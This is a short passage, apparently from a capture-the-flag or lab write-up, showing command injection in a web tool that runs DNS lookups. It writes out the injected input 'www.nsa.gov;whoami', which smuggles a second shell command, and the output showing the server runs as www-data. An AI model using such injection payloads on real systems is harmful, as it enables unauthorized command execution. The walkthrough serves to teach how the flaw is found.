Let's take a look what this does.
Response
```txt
Server: 1.1.1.1 Address: 1.1.1.1#53 Non-authoritative answer: www.nsa.gov canonical name = nsa.gov.edgekey.net. nsa.gov.edgekey.net canonical name = e16248.dscb.akamaiedge.net. Name: e16248.dscb.akamaiedge.net Address: 104.91.80.217
```
So looks like it runs a lookup command on an address. Let's try adding a semi-colon and a command after that.

Let's do a simple whoami
```txt
www.nsa.gov;whoami
```

Response
```txt
 Server: 1.1.1.1 Address: 1.1.1.1#53 Non-authoritative answer: www.nsa.gov canonical name = nsa.gov.edgekey.net. nsa.gov.edgekey.net canonical name = e16248.dscb.akamaiedge.net. Name: e16248.dscb.akamaiedge.net Address: 104.91.80.217 www-data
```
And at the end we can see that it also returns www-data.
